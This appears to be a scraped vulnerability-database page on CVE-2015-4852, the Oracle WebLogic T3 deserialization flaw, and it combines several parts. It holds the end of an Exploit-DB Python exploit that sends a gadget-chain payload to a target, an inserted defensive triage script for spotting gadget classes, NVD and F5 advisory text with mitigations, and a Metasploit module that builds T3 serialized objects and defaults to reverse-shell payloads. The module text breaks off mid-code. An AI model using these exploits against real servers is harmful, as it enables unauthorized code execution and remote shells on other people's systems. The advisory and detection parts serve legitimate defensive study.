\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r

\r

#print \"[+]Updated 'chunk1' : \\n\", chunk1\r

\r

#Get the final payload. This should have the appropriate TOTAL payload length in 'chunk1'\r

payload = chunk1 + chunk2 + chunk3\r

\r

#Adjust header for appropriate message length: the first four bytes of a T3 message are its big-endian 32-bit total length, so this overwrites the value computed by hand above\r

payload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\r

print '[+]Sending payload...'\r

sock.send(payload)\r

\r

print \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\"\r

print(\"\\n[+]Response to Request#: \\n\")\r

response = sock.recv(15000)\r

print(response)\r

\r

", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42806/"}
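The exploit above leans on two facts a defender can also use: a T3 message is prefixed with its big-endian 32-bit total length (the `struct.pack('!i', len(payload))` line), and the gadget chain travels as plain Java serialization streams (`\xac\xed\x00\x05` magic) whose TC_CLASSDESC entries spell out class names such as `org.apache.commons.collections.functors.InvokerTransformer`. The script below is an added triage example written for this page; it is not the exploit author's, Exploit-DB's or Oracle's code. It checks the framing invariant, counts embedded serialization streams, recovers class names with a linear scan and flags the CommonsCollections1 classes visible in chunk2. The sample frame is constructed inline (the header bytes after the length and the zero-field class descriptors are simplifications modelled on chunk1, not captured traffic). Matching on the magic alone, as a signature that only looks for serialized objects would, is noisy on T3 because the legitimate handshake objects in chunk1 and chunk3 (`weblogic.rjvm.ClassTableEntry`, `weblogic.common.internal.PackageInfo`) are serialized too; the class names are the discriminator.

```python
"""Triage a captured WebLogic T3 frame for Java deserialization gadget classes.

Added example for this page (not the exploit author's or Oracle's code).
The sample frame built at the bottom is constructed, not captured traffic.
"""
import re
import struct

JAVA_MAGIC = b"\xac\xed\x00\x05"   # ObjectOutputStream STREAM_MAGIC + STREAM_VERSION 5
TC_CLASSDESC = 0x72                  # tag that precedes a class descriptor

# Gadget-chain classes present in the page's CommonsCollections1 payload (chunk2).
GADGET_CLASSES = {
    "sun.reflect.annotation.AnnotationInvocationHandler",
    "org.apache.commons.collections.map.LazyMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
}

# Dotted Java class names; array descriptors like "[Ljava.lang.Object;" are deliberately excluded.
CLASS_RE = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)+$")


def declared_length(frame: bytes) -> int:
    """First four bytes of a T3 frame: big-endian total length (what struct.pack('!i') wrote)."""
    if len(frame) < 4:
        raise ValueError("frame shorter than the 4-byte length prefix")
    return struct.unpack("!I", frame[:4])[0]


def serialized_offsets(frame: bytes) -> list:
    """Offsets of every embedded Java serialization stream (one T3 frame may carry several)."""
    offsets, start = [], 0
    while True:
        i = frame.find(JAVA_MAGIC, start)
        if i < 0:
            return offsets
        offsets.append(i)
        start = i + len(JAVA_MAGIC)


def class_names(frame: bytes) -> list:
    """Recover class names from TC_CLASSDESC entries: 0x72, u16 length, modified-UTF8 name.

    This is a linear scan rather than a full object-stream parser (it does not follow
    TC_REFERENCE back-references); requiring the length field to fit and the bytes to
    look like a class name keeps stray 0x72 bytes in serialVersionUIDs from matching.
    """
    names = []
    for i in range(len(frame) - 3):
        if frame[i] != TC_CLASSDESC:
            continue
        n = struct.unpack("!H", frame[i + 1:i + 3])[0]
        candidate = frame[i + 3:i + 3 + n]
        if 0 < n <= 255 and len(candidate) == n and CLASS_RE.match(candidate):
            names.append(candidate.decode("ascii"))
    return names


def triage(frame: bytes) -> dict:
    """Summarise one frame; a non-empty 'gadget_hits' is the actionable signal."""
    classes = class_names(frame)
    return {
        "declared_length": declared_length(frame),
        "actual_length": len(frame),
        "serialized_streams": len(serialized_offsets(frame)),
        "classes": classes,
        "gadget_hits": sorted(GADGET_CLASSES.intersection(classes)),
    }


def _classdesc(name: bytes, uid: bytes) -> bytes:
    """Minimal TC_CLASSDESC: tag, name, serialVersionUID, flags, zero fields, end-block, null superclass."""
    return bytes([TC_CLASSDESC]) + struct.pack("!H", len(name)) + name + uid + b"\x02\x00\x00\x78\x70"


def build_sample_frame() -> bytes:
    """Constructed input: one benign WebLogic handshake class and one gadget class, T3-framed."""
    body = b"\xfe\x01\x00\x00" + JAVA_MAGIC + b"\x73" + _classdesc(
        b"weblogic.rjvm.ClassTableEntry", b"\x2f\x52\x65\x81\x57\xf4\xf9\xed")
    body += b"\xfe\x01\x00\x00" + JAVA_MAGIC + b"\x73" + _classdesc(
        b"org.apache.commons.collections.functors.InvokerTransformer",
        b"\x87\xe8\xff\x6b\x7b\x7c\xce\x38")
    header = b"\x01\x65\x01" + b"\xff" * 8   # placeholder for the opaque T3 header bytes after the length
    payload = header + body
    return struct.pack("!I", len(payload) + 4) + payload


if __name__ == "__main__":
    for key, value in triage(build_sample_frame()).items():
        print(f"{key}: {value}")
```

On the constructed frame the report lists both classes but flags only `InvokerTransformer`; feeding a truncated capture shows `declared_length` and `actual_length` disagree, which is how a reassembly problem (or a sender lying about the length, as the exploit would if the fix-up line were removed) shows up before any class-name matching is trusted.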

{"cve": [{"lastseen": "2019-05-29T18:14:42", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.", "edition": 1, "cvss3": {}, "published": "2015-11-18T15:59:00", "title": "CVE-2015-4852", "type": "cve", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2019-03-28T19:29:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.0.0", "cpe:/a:oracle:weblogic_server:12.1.2.0.0"], "id": "CVE-2015-4852", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.2.0.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:26", "bulletinFamily": "software", "cvelist": ["CVE-2015-4852"], "description": "

F5 Product Development has assigned ID 557810 (BIG-IP), ID 466536 (ARX), and ID 558495 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H30518307 on the **Diagnostics** > **Identified** > **Low** page.



To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.



Product | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature
---|---|---|---|---
BIG-IP LTM | 12.0.0, 11.0.0 - 11.6.1 | 12.1.0, 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP AAM | 12.0.0, 11.4.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library
BIG-IP AFM | 12.0.0, 11.3.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library
BIG-IP Analytics | 12.0.0, 11.0.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library
BIG-IP APM | 12.0.0, 11.0.0 - 11.6.1 | 12.1.0, 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP ASM | 12.0.0, 11.0.0 - 11.6.1 | 12.1.0, 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP DNS | 12.0.0 | 12.1.0 | Low | Java commons-collections library
BIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP GTM | 11.0.0 - 11.6.1 | 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP Link Controller | 12.0.0, 11.0.0 - 11.6.1 | 12.1.0, 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP PEM | 12.0.0, 11.3.0 - 11.6.1 | 12.1.0 | Low | Java commons-collections library
BIG-IP PSM | 11.0.0 - 11.4.1 | 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 10.1.0 - 10.2.4 | Low | Java commons-collections library
BIG-IP WOM | 11.0.0 - 11.3.0 | 10.1.0 - 10.2.4 | Low | Java commons-collections library
ARX | 6.0.0 - 6.4.0 | None | Low | Java commons-collections library
Enterprise Manager | 3.0.0 - 3.1.1 | None | High | Java commons-collections library
FirePass | None | 7.0.0, 6.0.0 - 6.1.0 | Not vulnerable | None
BIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None
BIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None
BIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None
BIG-IQ ADC | None | 4.5.0 | Not vulnerable | None
LineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None
F5 WebSafe | None | 1.0.0 | Not vulnerable | None
Traffix SDC | 4.0.0 - 4.4.0, 3.3.2 - 3.5.1 | None | Low | Java commons-collections library



If you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.



Mitigation



To mitigate this vulnerability, perform either of the following suggestions:



* [Limiting local shell and tmui access to trusted administrative users only](<https://support.f5.com/csp/article/K30518307#m1>)

* [Mitigating using an updated BIG-IP ASM attack signature](<https://support.f5.com/csp/article/K30518307#m2>)



Limiting local shell and tmui access to trusted administrative users only



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For information about limiting administrative access, refer to [K12029: Accessing the TMOS Shell](<https://support.f5.com/csp/article/K12029>).



Mitigating using an updated BIG-IP ASM attack signature



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For customers who employ the BIG-IP ASM system in their security architecture, the **ASM-SignatureFile_20151122_113350** attack signature file (or later) is able to detect Java serialized objects that may be used in an attack. For information about BIG-IP ASM attack signatures, refer to [K8217: Managing BIG-IP ASM attack signatures](<https://support.f5.com/csp/article/K8217>).



* [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)

* [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)

* [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)

* [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)

* [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)

* [K17465: Determining if a Known Issue is resolved for a specific BIG-IP version](<https://support.f5.com/csp/article/K17465>)

* [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)

", "edition": 1, "modified": "2018-08-28T21:28:00", "published": "2015-12-15T22:19:00", "id": "F5:K30518307", "href": "https://support.f5.com/csp/article/K30518307", "title": "Java commons-collections library vulnerability CVE-2015-4852", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T17:22:57", "bulletinFamily": "software", "cvelist": ["CVE-2015-4852"], "edition": 1, "description": "Vulnerability Recommended Actions



If you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.



F5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.



To mitigate this vulnerability, perform either of the following suggestions:



Limiting local shell and tmui access to trusted administrative users only



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For information about limiting administrative access, refer to SOL12029: Accessing the Traffic Management Shell.



Mitigating using an updated BIG-IP ASM attack signature



**Impact of action:** _Performing the following action should not have a negative impact on your system._



For customers who employ the BIG-IP ASM system in their security architecture, the **ASM-SignatureFile_20151122_113350** attack signature file (or later) is able to detect Java serialized objects that may be used in an attack. For information about BIG-IP ASM attack signatures, refer to SOL8217: Updating the BIG-IP ASM attack signatures.



Supplemental Information



* SOL9970: Subscribing to email notifications regarding F5 products

* SOL9957: Creating a custom RSS feed to view new and updated documents

* SOL4918: Overview of the F5 critical issue hotfix policy

* SOL167: Downloading software and firmware from F5

* SOL17465: Determining if a Known Issue is resolved for a specific BIG-IP version

* SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)

", "modified": "2016-05-28T00:00:00", "published": "2015-12-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/30/sol30518307.html", "id": "SOL30518307", "title": "SOL30518307 - Java commons-collections library vulnerability CVE-2015-4852", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2019-03-28T17:03:19", "description": "", "published": "2019-03-28T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2019-03-28T00:00:00", "id": "EDB-ID:46628", "href": "https://www.exploit-db.com/exploits/46628", "sourceData": "##\r

# This module requires Metasploit: https://metasploit.com/download\r

# Current source: https://github.com/rapid7/metasploit-framework\r

##\r

\r

require 'msf/core/exploit/powershell'\r

\r

class MetasploitModule < Msf::Exploit::Remote\r

Rank = ExcellentRanking\r

\r

include Msf::Exploit::Remote::Tcp\r

#include Msf::Exploit::Remote::HttpClient\r

include Msf::Exploit::Powershell\r

\r

def initialize(info={})\r

super(update_info(info,\r

'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',\r

'Description' => %q{\r

An unauthenticated attacker with network access to the Oracle Weblogic Server T3\r

interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)\r

to the interface to execute code on vulnerable hosts.\r

},\r

'Author' =>\r

[\r

'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)\r

'Stephen Breen', # Vulnerability Discovery\r

'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs\r

],\r

'License' => MSF_LICENSE,\r

'References' =>\r

[\r

['CVE', '2015-4852']\r

],\r

'Privileged' => false,\r

'Platform' => %w{ unix win solaris },\r

'Targets' =>\r

[\r

[ 'Unix',\r

'Platform' => 'unix',\r

'Arch' => ARCH_CMD,\r

'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},\r

'Payload' => {\r

'Encoder' => 'cmd/ifs',\r

'BadChars' => ' ',\r

'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}\r

}\r

],\r

[ 'Windows',\r

'Platform' => 'win',\r

'Payload' => {},\r

'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\r

],\r

[ 'Solaris',\r

'Platform' => 'solaris',\r

'Arch' => ARCH_CMD,\r

'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\r

'Payload' => {\r

'Space' => 2048,\r

'DisableNops' => true,\r

'Compat' =>\r

{\r

'PayloadType' => 'cmd',\r

'RequiredCmd' => 'generic perl telnet',\r

}\r

}\r

]\r

],\r

'DefaultTarget' => 0,\r

'DisclosureDate' => 'Jan 28 2015'))\r

\r

register_options([Opt::RPORT(7001)])\r

end\r

\r

=begin This check is currently incompatible with the Tcp mixin. :-(\r

def check\r

resp = send_request_cgi(\r

'method' => 'GET',\r

'uri' => '/console/login/LoginForm.jsp'\r

)\r

\r

return CheckCode::Unknown unless resp && resp.code == 200\r

\r

unless resp.body.include?('Oracle WebLogic Server Administration Console')\r

vprint_warning(\"Oracle WebLogic Server banner cannot be found\")\r

return CheckCode::Unknown\r

end\r

\r

/WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.\\d*)/ =~ resp.body\r

unless version\r

vprint_warning(\"Oracle WebLogic Server version cannot be found\")\r

return CheckCode::Unknown\r

end\r

\r

version = Gem::Version.new(version)\r

vprint_good(\"Detected Oracle WebLogic Server Version: #{version}\")\r

case\r

when version.to_s.start_with?('10.3')\r

return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')\r

when version.to_s.start_with?('12.1.2')\r

return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')\r

when version.to_s.start_with?('12.1.3')\r

return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')\r

when version.to_s.start_with?('12.2')\r

return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')\r

end\r

\r

return CheckCode::Safe\r

end\r

=end\r

\r

def t3_handshake\r

# retrieved from network traffic\r

shake = \"t3 12.2.1\

\"\r

shake << \"AS:255\

\"\r

shake << \"HL:19\

\"\r

shake << \"MS:10000000\

\

\"\r

\r

sock.put(shake)\r

sleep(1)\r

sock.get_once\r

end\r

\r

def build_t3_request_object\r

# T3 request serialized data\r

# retrieved by watching network traffic\r

# This is a proprietary, undocumented protocol\r

\r

# TODO: Cite a source for the dissection of in the following 14 lines:\r

data = '000005c3' # lenght of the packet\r

data << '01' # CMD_IDENTIFY_REQUEST\r

data << '65' # QOS\r

data << '01' # Flags:\r

# CONTEXT_JVMID_FLAG = 1 (has JVMIDs)\r

# CONTEXT_TX_FLAG = 2\r

# CONTEXT_TRACE_FLAG = 4\r

# CONTEXT_EXTENDED_FLAG = 8\r

# CONTEXT_EXTENDED_USER_FLAG = 16\r

data << 'ffffffff' # response id\r

data << 'ffffffff' # invocable id\r

data << '0000006a' # abbrev offset\r

data << '0000ea60' # reconnect timeout ??\r

\r

data << '0000001900937b484a'\r

data << '56fa4a777666f581daa4f5b90e2aebfc607499'\r

data << 'b4027973720078720178720278700000000a00'\r

data << '00000300000000000000060070707070707000'\r

data << '00000a000000030000000000000006007006'\r

\r

data << 'fe010000' # ----- separator -----\r

\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '72001d' # className (29 bytes):\r

data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry\r

data << '5461626c65456e747279' # (continued)\r

data << '2f52658157f4f9ed' # serialVersionUID\r

data << '0c00007870' # remainder of object header\r

data << '72' # object header\r

data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo\r

data << '65726e616c2e5061636b616765496e666f' # (continued)\r

data << 'e6f723e7b8ae1ec9' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0008' # fieldCount = 8\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '4c0009696d706c5469746c65' # 5: Obj: implTitle\r

data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String\r

data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor\r

data << '71007e0003' # (Handle) 0x007e0003\r

data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion\r

data << '71007e0003' # (Handle) 0x007e0003\r

data << '78707702000078' # block footers\r

\r

data << 'fe010000' # ----- separator -----\r

\r

data << 'aced0005' # JSO v5 header\r

data << '7372' # object header\r

data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry\r

data << '735461626c65456e747279' # (continued)\r

data << '2f52658157f4f9ed' # serialVersionUID\r

data << '0c' # EXTERNALIZABLE | BLOCKDATA\r

data << '00007870' # remainder of object header\r

data << '72' # object header\r

data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo\r

data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)\r

data << '972245516452463e' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0003' # fieldCount = 3\r

data << '5b0008' # array header (8 bytes)\r

data << '7061636b61676573' # ARRAY NAME = 'packages'\r

data << '740027' # TC_STRING className1 (39 bytes)\r

data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo\r

data << '6e7465726e616c2f5061636b616765496e666f' # (continued)\r

data << '3b' # (continued)\r

data << '4c000e' # object header (14 bytes)\r

data << '72656c6561736556657273696f6e' # releaseVersion\r

data << '740012' # TC_STRING (18 bytes)\r

data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes\r

data << '5b0012' # array header (18 bytes)\r

data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;\r

data << '740002' # TC_STRING (2 bytes)\r

data << '5b42' # 0x5b42 = [B\r

data << '78' # block footer\r

\r

data << '720024' # class (36 bytes)\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo\r

data << '7465726e616c2e5061636b616765496e666f' # (continued)\r

data << 'e6f723e7b8ae1ec9' # serialVersionUID\r

\r

data << '02' # SC_SERIALIZABLE\r

data << '0008' # fieldCount = 8\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '4c0009696d706c5469746c65' # 5: Obj: implTitle\r

data << '71' # TC_REFERENCE\r

data << '007e0004' # Handle = 0x007e0004\r

data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor\r

data << '71' # TC_REFERENCE\r

data << '007e0004' # Handle = 0x007e0004\r

data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion\r

data << '71' # TC_REFERENCE\r

data << '007e0004' # Handle = 0x007e0004\r

data << '78' # class footer\r

data << '70' # TC_NULL\r

data << '77020000' # BLOCKDATA (2 bytes): 0x0000\r

data << '78' # block footer\r

\r

data << 'fe010000' # ----- separator -----\r

\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '72001d' # className (29 bytes):\r

data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry\r

data << '5461626c65456e747279' # (continued)\r

data << '2f52658157f4f9ed' # serialVersionUID\r

data << '0c00007870' # remainder of object header\r

data << '720021' # className (33 bytes)\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo\r

data << '65726e616c2e50656572496e666f' # (continued)\r

data << '585474f39bc908f1' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0006' # fieldCount = 6\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '5b00087061636b61676573' # 5: Array: packages\r

data << '740027' # TC_STRING (39 bytes)\r

data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;\r

data << '6e7465726e616c2f5061636b616765496e666f' # (continued)\r

data << '3b' # (continued)\r

data << '78' # block footer\r

data << '720024' # class header\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo;\r

data << '65726e616c2e56657273696f6e496e666f' # (continued)\r

data << '972245516452463e' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0003' # fieldCount = 3\r

data << '5b0008' # 0: Array\r

data << '7061636b6167657371' # packages\r

data << '007e0003' # Handle = 0x00730003\r

data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion\r

data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;\r

data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes\r

data << '740002' # TC_STRING (2 bytes)\r

data << '5b42' # VALUE = 0x5b42 = [B\r

data << '78' # block footer\r

data << '720024' # class header\r

data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo\r

data << '6e616c2e5061636b616765496e666f' # (continued)\r

data << 'e6f723e7b8ae1ec9' # serialVersionUID\r

data << '02' # SC_SERIALIZABLE\r

data << '0008' # fieldCount = 8\r

data << '4900056d616a6f72' # 0: Int: major\r

data << '4900056d696e6f72' # 1: Int: minor\r

data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch\r

data << '49000b736572766963655061636b' # 3: Int: servicePack\r

data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch\r

data << '4c0009696d706c5469746c65' # 5: Obj: implTitle\r

data << '71' # TC_REFERENCE\r

data << '007e0005' # Handle = 0x007e0005\r

data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor\r

data << '71' # TC_REFERENCE\r

data << '007e0005' # Handle = 0x007e0005\r

data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion\r

data << '71' # TC_REFERENCE\r

data << '007e0005' # Handle = 0x007e0005\r

data << '78' # class footer\r

data << '707702000078' # block footers\r

\r

data << 'fe00ff' # this cruft again. some kind of footer\r

\r

data << 'fe010000' # ----- separator -----\r

\r

# weblogic.rjvm.JVMID object\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '720013' # class header\r

data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'\r

data << 'dc49c23ede121e2a' # serialVersionUID\r

data << '0c' # EXTERNALIZABLE | BLOCKDATA\r

data << '0000' # fieldCount = 0 (!!!)\r

data << '78' # block footer\r

data << '70' # NULL\r

data << '7750' # block header (80 bytes)\r

data << '21' # !\r

data << '000000000000000000' # 9 NULL BYTES\r

\r

data << '0d' # strLength = 13 bytes\r

#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227\r

data << '3030302e3030302e3030302e30' # new string = 000.000.000.0\r

# (must be an IP, and length isn't trivially editable)\r

data << '00' # \\0\r

\r

data << '12' # strLength = 18 bytes\r

#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh\r

data << rand_text_alphanumeric(18).unpack('H*')[0]\r

\r

data << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized)\r

\r

data << '000000070000' # ??? UNKNOWN ???\r

data << rport.to_s(16).rjust(4, '0') # callback port\r

data << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ???\r

data << 'ffffffffff' # ??? UNKNOWN ???\r

data << '78' # block footer\r

\r

data << 'fe010000' # ----- separator -----\r

\r

# weblogic.rjvm.JVMID object\r

data << 'aced0005' # JSO v5 header\r

data << '73' # object header\r

data << '72' # class\r

data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID\r

data << 'dc49c23ede121e2a' # serialVersionUID\r

data << '0c' # EXTERNALIZABLE | BLOCKDATA\r

data << '0000' # fieldCount = 0\r

data << '78' # end block\r

data << '70' # TC_NULL\r

data << '77' # block header\r

data << '20' # length = 32 bytes\r

data << '0114dc42bd071a772700' # old string = ??? UNKNOWN ???\r

#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZATION BREAKS THINGS)\r

\r

data << '0d' # string length = 13 bytes (NOTE: do not edit)\r

